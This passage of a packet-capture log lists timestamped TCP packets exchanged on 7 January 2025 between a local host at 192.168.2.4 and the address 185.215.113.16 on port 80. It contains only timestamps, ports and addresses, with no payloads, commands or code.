Jan 7, 2025 10:08:20.519246101 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.519254923 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.519270897 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.644099951 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644115925 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644128084 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644140005 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644145966 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644153118 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644165039 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.644193888 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644203901 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.644208908 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644232035 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644234896 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.644244909 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644257069 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644265890 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.644268990 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644280910 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644292116 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644304037 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644304037 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.644315958 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644320965 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.644330978 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644341946 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.644344091 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644360065 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644372940 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644383907 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644383907 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.644392967 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.644396067 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644409895 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.644417048 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.644443989 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.645092964 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.645106077 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.645117044 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.645128965 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.645140886 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.645168066 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.645168066 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.646187067 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.646200895 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.646212101 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.646223068 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.646234989 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.646240950 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.646241903 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.646253109 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.646264076 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.646275043 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.646284103 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.646289110 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.646302938 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.646313906 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.646318913 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.646323919 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.646325111 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.646352053 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647020102 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647032022 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647043943 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647056103 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647058010 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647068977 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647078037 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647080898 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647094011 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647105932 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647108078 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647111893 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647119999 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647125959 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647167921 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647193909 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647195101 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647207022 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647239923 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647244930 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647257090 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647268057 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647279024 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647289991 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647300005 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647305012 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647305965 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647310972 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647330999 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647335052 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647344112 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647356033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647358894 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647367001 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647380114 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647389889 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647392035 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647403955 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647412062 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647416115 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647427082 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647429943 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647456884 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647814035 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647828102 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647839069 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647850037 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647860050 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647866011 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647895098 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647911072 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647922993 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647941113 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647953033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647964954 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647975922 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.647979021 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.647989035 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.648000002 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.648003101 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.648017883 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.648030043 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.648049116 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.731062889 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.731079102 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.731138945 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.766307116 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766318083 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766329050 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766340017 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766400099 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.766463041 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766490936 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766500950 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766541004 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766547918 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.766577959 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.766599894 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766612053 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766622066 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766634941 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766666889 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.766805887 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766856909 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766866922 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766894102 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.766901970 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766925097 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766944885 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.766982079 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.766994953 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767005920 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767019987 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.767038107 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.767064095 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767075062 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767118931 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.767307997 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767334938 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767345905 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767380953 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.767417908 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767429113 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767440081 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767453909 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.767481089 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.767482996 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767507076 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767559052 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.767627001 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767637968 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767649889 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767683983 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.767703056 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767714977 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767725945 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767748117 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.767767906 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.767874002 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767887115 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767898083 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767923117 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.767950058 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767962933 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767975092 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.767997026 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.768012047 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.768028975 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.768040895 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.768079042 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.768121958 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.768132925 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.768143892 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.768163919 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.768270969 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.768556118 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.768565893 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.768575907 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.768588066 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.768598080 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.768605947 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.768610001 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.768623114 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.768625021 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.768635035 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.768651962 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.768671036 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.769112110 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769124031 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769135952 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769172907 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.769203901 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769216061 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769227028 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769241095 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769252062 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.769273996 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.769278049 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769320965 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.769331932 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769344091 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769378901 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.769428015 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769439936 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769450903 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769463062 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769479036 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.769494057 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.769522905 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769532919 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769546986 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769557953 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769591093 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.769675970 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769686937 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769695997 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769709110 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769737959 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.769759893 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.769819975 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769833088 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769850016 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769860029 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769866943 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.769870996 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769882917 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769892931 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769905090 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769906044 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.769917011 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769931078 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.769932032 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.769958973 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.769978046 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.891299009 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891321898 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891334057 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891361952 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891419888 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.891496897 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891516924 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891521931 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.891527891 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891563892 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.891609907 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891623020 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891635895 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891660929 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.891690969 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.891762018 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891774893 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891805887 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891812086 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.891819954 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891864061 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.891913891 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891926050 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891936064 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.891956091 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.892033100 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892066002 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892077923 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892088890 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892100096 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892107010 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.892134905 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.892182112 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892194033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892204046 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892232895 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.892323971 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892340899 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892354965 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892364979 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892390013 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892406940 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892416000 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.892416000 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.892419100 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892431021 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892433882 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.892463923 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892482042 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.892503023 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.892776012 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892828941 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892838955 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892851114 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892882109 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.892887115 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892900944 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.892906904 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.892941952 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.892992973 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893003941 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893016100 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893027067 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893038988 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893039942 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.893059969 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.893100977 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893112898 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893172026 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.893193007 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893203020 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893213987 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893225908 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893234015 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.893260956 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.893282890 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893300056 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893311977 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893318892 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.893352985 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.893354893 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893368006 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893378973 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.893398046 CET	49884	80	192.168.2.4	185.215.113.16
